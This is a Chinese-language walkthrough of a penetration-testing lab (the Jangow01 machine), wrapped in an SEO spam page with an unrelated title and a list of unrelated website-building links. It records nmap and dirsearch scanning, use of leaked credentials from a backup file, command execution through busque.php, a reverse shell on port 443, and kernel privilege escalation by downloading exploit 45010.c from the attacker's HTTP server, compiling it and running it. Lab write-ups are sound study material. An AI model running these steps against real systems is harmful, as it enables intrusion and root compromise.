当前位置: 首页 > news >正文

超市网站建设策划书app界面怎么做

超市网站建设策划书,app界面怎么做,怎样经营好一个网站,视频网站采集规则kali:192.168.223.128 主机发现 nmap -sP 192.168.223.0/24 端口扫描 nmap -p- 192.168.223.154 开启了21 80端口 web看一下,有个busque.php参数是buscar,但是不知道输入什么,尝试文件包含失败 扫描目录 dirsearch -u http://192.168.223.154 dirse…

kali:192.168.223.128

主机发现

nmap -sP 192.168.223.0/24

端口扫描

nmap -p- 192.168.223.154

开启了21 80端口

web看一下,有个busque.php参数是buscar,但是不知道输入什么,尝试文件包含失败

扫描目录

dirsearch -u http://192.168.223.154
dirsearch -u http://192.168.223.154/site

扫到一个backup并且知道这是一个wordpress服务

打开发现有账号密码

jangow01/abygurl69

前面扫到21端口ftp服务,用ftp连接

去busque看一下

原来是可以执行命令,下次测试参数的时候可以尝试RCE

反弹shell

尝试好几种反弹shell语句都失败,看了别人的wp发现靶机之开启了443端口

监听443端口发现拿到shell

在jiangow01目录下找到第一个flag

然后找提权手段

看看suid

看看定时任务

看看备份文件

没什么有用的文件

看看内核版本

Ubuntu 4.4.0-31  16.04

搜一下有没有漏洞

searchsploit ubuntu 4.4.0-31


 

发现有好几个本地提权的

45010.c更符合版本,先下载下来

searchsploit -m 45010.c

看一下内容

可以看到这是个CVE 需要编译

先传到靶机再编译(我试了先编译再上传发现执行失败,不知道什么原因)

mv 45010.c /tmp       #移至tmp目录
python -m http.server 443 #开启http服务wget http://192.168.223.128:443/45010.c  #靶机获取exp
gcc 45010.c -o exp  #编译
chmod +x exp #添加执行权限
./exp  #执行

拿到最终flag

总结1.tfp连接读取敏感文件

        2.内核提权

http://www.yayakq.cn/news/111801/

相关文章:

  • 做韩国外贸网站wordpress源码修改
  • 手机网站建设基本流程外管局网站怎么做报告
  • 手机移动开发网站建设海络网站
  • 长春电商网站建设多少钱搜狗推广排名
  • 深圳网站空间河南省住房和城乡建设厅二维码网站
  • 源码怎么做网站无锡网站建设 微信公众号
  • 黄岛开发区做网站的公司免费wordpress外贸主题
  • 教人做甜品的网站个人网站模板制作教程
  • 网站建设有发展吗企业所得税2021最新
  • 湖南做门户网站的公司做房产经纪的那些网站可以进客
  • 西安网站建设中企建站c mvc网站开发
  • flash 做ppt的模板下载网站有哪些个人论坛类网站
  • 怎么用vps的linux做网站网站推广营销策略
  • 电子商务网站建设开发乐彩网站源码网站建设
  • 企业为何要建设网站福建城乡建设部网站首页
  • 拨付网站建设经费的请示北京网站制作外包
  • 酒泉网站建设培训智慧团建pc版官网
  • 网站代优化学校网站
  • 网站空间域名申请网站wordpress会员分销
  • 如何利用视频网站做推广扬中网站建设包括哪些
  • 快速创建网站电商网站建设实训(互联网营销大赛)
  • 兴平做网站南京建设局网站
  • 大网站成本中山市西区建设局网站
  • 网站开发app旅游网页设计说明200字
  • 做seo必须有网站吗个人网站 创意
  • 深圳建站公司 企网站kj6699的seo综合查询
  • 我的校园网站制作ppt怎么做网站
  • 创新的做网站wordpress 自定义页面 模版
  • 2015帝国cms网站域名注册网站查询
  • 贴吧网站怎么做网站域名注销